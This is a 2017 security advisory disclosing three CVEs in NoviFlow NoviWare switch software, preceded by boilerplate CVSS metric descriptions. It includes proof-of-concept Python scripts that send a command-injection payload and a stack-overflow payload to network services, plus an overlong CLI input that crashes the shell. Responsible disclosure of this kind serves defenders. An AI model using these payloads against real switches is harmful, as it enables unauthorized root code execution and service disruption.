The vulnerable system is bound to a protocol stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared proximity (e.g., Bluetooth, NFC, or IEEE 802.11) or logical network (e.g., local IP subnet), or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN within an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
NoviFlow NoviWare <= NW400.2.6 - Multiple VulnerabilitiesNoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
Introduction
==========
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant
switch software developed by NoviFlow and available for license to
network equipment manufacturers.
Multiple vulnerabilities were identified in the NoviWare software
deployed on NoviSwitch devices. They could allow a remote attacker to
gain privileged code execution on the switch (non-default
configuration) or a low-privileged CLI user to execute code as root.
CVEs
=====
* CVE-2017-12784: remote code execution in novi_process_manager_daemon
Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
* CVE-2017-12785: cli breakout in novish
Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
* CVE-2017-12786: remote code execution in noviengine and cliengine
Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Affected versions
==============
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version
is deployed
Author
======
Franois Goichon - Google Security Team
CVE-2017-12784
==============
Remote code execution in novi_process_manager_daemon
Summary
-------------
The NoviWare switching software distribution is prone to two distinct
bugs which could potentially allow a remote, unauthenticated attacker
to gain privileged (root) code execution on the switch device.
- A flaw when applying ACL changes requested from the CLI could expose
the novi_process_manager_daemon network service
- This network service is prone to command injection and a stack-based
buffer overflow
Reproduction
------------------
If TCP port 2020 is accepting connections from the network, the
following python script can be used to ping yourself on vulnerable
versions :
---
from struct import pack
import socket
s = socket.socket()
s.connect((<switch host>, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)
s.close()
---
On vulnerable versions, the appliance will perform an ICMP request to
the specified IP, which can be observed in network logs.
Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get
the latest release along with release notes. For more information,
contact [email protected].
CVE-2017-12785
==============
Cli breakout in novish
Summary
-------------
The NoviWare switching software distribution is prone to a buffer
overflow and a command injection, allowing authenticated,
low-privileged users to break out of the CLI and execute commands as
root.
Reproduction
------------------
Log in to the appliance via SSH and run the following command from the CLI:
--
noviswitch# show log cli username
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--
If the appliance is vulnerable, the cli crashes and the session ends.
Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get
the latest release along with release notes. For more information,
contact [email protected].
CVE-2017-12786
==============
Remote code execution in noviengine and cliengine
Summary
-------------
The NoviWare switching software distribution is prone to two distinct
bugs which could potentially allow a remote, unauthenticated attacker
to gain privileged (root) code execution on the switch device.
- A flaw when applying ACL changes requested from the CLI could expose
noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow
when unpacking serialized values.
Reproduction
------------------
If TCP ports 9090 or 12345 are accepting connections from the network,
the following python script can be used to cause a crash on vulnerable
versions :
---
from struct import pack
import socket
s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)
s.read(1)
s.close()
---
A watchdog should restart the service if it has crashed.
Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get
the latest release along with release notes. For more information,
contact [email protected].
Disclosure timeline
===============
2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure